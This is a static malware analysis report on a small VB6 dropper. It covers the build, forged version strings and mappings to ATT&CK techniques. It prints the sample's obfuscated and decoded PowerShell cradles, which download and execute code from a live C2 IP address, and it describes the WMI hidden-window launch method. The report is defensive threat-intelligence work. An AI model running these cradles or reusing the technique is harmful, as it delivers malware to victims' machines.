typeanalysisfamily54e64econfidencemediumcreated2026-08-14
SHA-256: 4544f0e53697d770eac70abad5790433d5e0b70282758c0b3383bf04a4f7f9ba

4544f0e5 — 54e64e (Morph 8: VB6 PowerShell Cradle + WMI Hidden-Process Dropper)

Status: Static-only. CAPE skipped — no Windows guest available.

1. Build / RE

Language / Compiler: Visual Basic 6 (VB6), compiled to native x86 via MSVBVM60.DLL runtime. ^[file.txt] ^[rabin2-info.txt:17] (lang: vb) ^[strings.txt:3] (MSVBVM60.DLL) ^[strings.txt:12] (C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB). The .text entrypoint is a standard VB5/6 ThunRTMain thunk pushing the VB project descriptor at 0x4010ec before calling the runtime. ^[r2:entry0]

Architecture: PE32, Intel 80386, GUI subsystem, 3 sections (.text, .data, .rsrc). ^[file.txt] ^[pefile.txt:37] (Machine: 0x14C).

Linker: Linker version 6.0 (Major=6, Minor=0). ^[pefile.txt:48] PE timestamp claims 2026-05-28 17:46:51 UTC (0x6A187F8B). ^[pefile.txt:37]

Packing / Obfuscation: None. Not packed, not stripped. The binary is 28 672 bytes but Byte 0x00 makes up 82.4672% of the file's contents ^[pefile.txt:3] — the .data section carries VirtualSize=0xA38 yet SizeOfRawData=0x0, meaning the on-disk image is padded with nulls that expand to zero-initialized data at runtime. ^[pefile.txt:103] No encryption, no custom packer.

Anti-Analysis: Minimal. No debug checks, no VM detection, no anti-disassembly tricks. The .text entropy is only 2.40 ^[pefile.txt:96] — consistent with VB6 p-code or lightly compiled native code with large runtime stubs.

Imports: Trivial import table — only MSVBVM60.DLL via bound imports (bound timestamp 2016-03-25). ^[pefile.txt:246] No direct CreateProcess, ShellExecute, or WinExec imports; execution is delegated to the VB6 runtime (ThunRTMain).

Version Info / Masquerade: VS_VERSIONINFO block present in .rsrc. ^[pefile.txt:195] Forged metadata uses absurd, likely LLM-scraped or prompt-generated strings:

  • CompanyName: "To give an accurate answer" ^[exiftool.json:36]
  • LegalCopyright / LegalTrademarks: "still popular for GPUs" ^[exiftool.json:37]
  • InternalName: "WMI" ^[exiftool.json:42]
  • OriginalFilename: "WMI.exe" ^[exiftool.json:42]
  • ProductName: "Project1" ^[exiftool.json:39]

These are not plausible human-authored version strings; they read like truncated forum answers or ChatGPT output fragments reused by an automated builder. See version-info-masquerade.

Embedded Strings (radare2 recovered): The standard strings tool missed the payload strings; radare2's /azs scan recovered them from .rsrc/.data:

powershell iex(('ssissrsssm 91.92.240.125:8888/2j | isssesssx').replace('s',''))
powershell iex(('ssissrsssm 91.92.240.125:8888/w5 | isssesssx').replace('s',''))

^[r2:strings]

After stripping 's' characters, both decode to:

  • powershell iex('irm 91.92.240.125:8888/2j | iex')
  • powershell iex('irm 91.92.240.125:8888/w5 | iex')

Two C2 paths (/2j and /w5) suggest either a primary/failover payload scheme or builder-parameterized URI generation.

WMI Process Spawn Strings (radare2 recovered):

  • Win32_ProcessStartup
  • SpawnInstance_
  • Win32_Process
  • mgmts:\\.\root\cimv2
  • ShowWindow
  • Create ^[r2:strings]

These correspond to the WMI Win32_Process.Create hidden-window pattern (T1564.003). The VB6 binary likely instantiates the WMI COM objects at runtime via CreateObject (VB6 internal) and spawns PowerShell invisibly.

2. Deploy / ATT&CK

All TTPs below are inferred from static strings and PE metadata; no dynamic execution was performed (CAPE skipped — no Windows guest).

Technique ATT&CK ID Evidence
Command and Scripting Interpreter: PowerShell T1059.001 Two embedded powershell iex(...) cradles with irm download-and-execute. ^[r2:strings]
Ingress Tool Transfer T1105 irm 91.92.240.125:8888/2j and /w5 — HTTP payload retrieval via Invoke-RestMethod. ^[r2:strings]
Hide Artifacts: Hidden Window T1564.003 WMI Win32_ProcessStartup.ShowWindow = 0 + Win32_Process.Create to spawn PowerShell hidden. ^[r2:strings]
Masquerading: Match Legitimate Name or Location T1036.005 OriginalFilename: WMI.exe, InternalName: WMI — masquerades as a Windows Management Instrumentation utility. ^[exiftool.json:42]
Masquerading T1036 Absurd LLM-scraped version strings ("To give an accurate answer", "still popular for GPUs"). ^[exiftool.json:36-37]
User Execution: Malicious File T1204.002 PE32 GUI executable, user-launched. ^[file.txt]

C2 / Infrastructure:

  • IP: 91.92.240.125:8888
  • Paths: /2j, /w5
  • Protocol: HTTP (inferred from irm without -UseBasicParsing or TLS flags in the stripped string). No domain, no hardcoded URI beyond the IP.

Attribution / Builder Clues:

  • The Project1 default project name and Module1 / MDIForm1 identifiers are unmodified VB6 IDE defaults, indicating a low-effort builder or a novice operator. ^[strings.txt:4-8]
  • The version-string word salad ("To give an accurate answer", "still popular for GPUs") strongly suggests an automated builder that samples text from LLM outputs, StackOverflow, or Reddit threads to populate VS_VERSIONINFO fields. This is a distinct builder artefact not observed in the seven prior 54e64e morphs.
  • No code overlap with prior 54e64e morphs (MSVC, Go, .NET, IExpress/AutoIt3). The only commonality is the OpenCTI umbrella label and the dropped-by-amadey co-tag.

Summary

This sample is the eighth confirmed build morph under the contested 54e64e OpenCTI label. It is a minimal VB6-native PE that embeds two PowerShell download cradles (with trivial replace('s','') obfuscation) and delegates hidden execution to WMI via the VB6 runtime's COM object instantiation. No custom packer, no anti-analysis, and absurd LLM-scraped version metadata. Static-only analysis; dynamic confirmation of the WMI → PowerShell chain would require a Windows sandbox.